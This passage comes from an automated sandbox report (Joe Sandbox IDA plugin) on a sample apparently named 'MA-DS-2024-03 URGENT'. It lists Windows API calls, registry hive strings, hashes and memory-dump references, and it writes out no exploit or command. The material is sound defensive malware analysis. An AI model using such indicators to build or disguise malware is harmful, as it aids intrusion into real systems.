                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID: ,,I
                                                        • API String ID: 2395222682-4163367948
                                                        • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                        • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                        • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                        • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                        • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                        • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                        • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                        APIs
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                          • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                        • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                        • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                        • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 0919b58da7cc5f40bdebd74c0183a587c6a80134b558d621886d7f10d265267e
                                                        • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                        • Opcode Fuzzy Hash: 0919b58da7cc5f40bdebd74c0183a587c6a80134b558d621886d7f10d265267e
                                                        • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00464F7A
                                                          • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                        • SetActiveWindow.USER32 ref: 0046500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                        • Sleep.KERNEL32(000000FA), ref: 00465043
                                                        • IsWindow.USER32 ref: 0046504F
                                                        • EndDialog.USER32(00000000), ref: 00465060
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                        • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                        • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                        • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                        • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                        • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                        • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                        APIs
                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                        • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                        • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                        • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                        • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                        APIs
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        • GetSysColor.USER32(0000000F), ref: 004021D3
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                        • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                        • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                        • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                        • _wcscpy.LIBCMT ref: 0046A9FF
                                                        Strings
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                        • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                        • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                        • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                        APIs
                                                        • _memset.LIBCMT ref: 0048716A
                                                        • CreateMenu.USER32 ref: 00487185
                                                        • SetMenu.USER32(?,00000000), ref: 00487194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                        • IsMenu.USER32(?), ref: 00487237
                                                        • CreatePopupMenu.USER32 ref: 00487241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                        • DrawMenuBar.USER32 ref: 00487276
                                                        Strings
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                        • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                        • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                        • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                        • DeleteDC.GDI32(00000000), ref: 00487594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                        • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                        • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                        • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                        APIs
                                                        • _memset.LIBCMT ref: 00426E3E
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • __gmtime64_s.LIBCMT ref: 00426ED7
                                                        • __gmtime64_s.LIBCMT ref: 00426F0D
                                                        • __gmtime64_s.LIBCMT ref: 00426F2A
                                                        • __allrem.LIBCMT ref: 00426F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                        • __allrem.LIBCMT ref: 00426FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                        • __allrem.LIBCMT ref: 00426FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                        • __invoke_watson.LIBCMT ref: 00427077
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462542
                                                        • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                        • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                        • GetMenuItemCount.USER32(?), ref: 0046262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                        • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                        • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                        • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                        • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                        • _memset.LIBCMT ref: 00486FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                        • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                        • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                        • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                        • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                        • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                        • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                        • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • CoInitialize.OLE32 ref: 00478403
                                                        • CoUninitialize.OLE32 ref: 0047840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                        • IIDFromString.OLE32(?,?), ref: 004784E1
                                                        • VariantInit.OLEAUT32(?), ref: 0047857B
                                                        • VariantClear.OLEAUT32(?), ref: 004785DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                        • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                        • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                        • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                        • GetLastError.KERNEL32 ref: 0046B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                        • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                        • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                        • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                        • GetDlgCtrlID.USER32 ref: 0045901F
                                                        • GetParent.USER32 ref: 0045903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00459047
                                                        • GetParent.USER32(?), ref: 00459063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
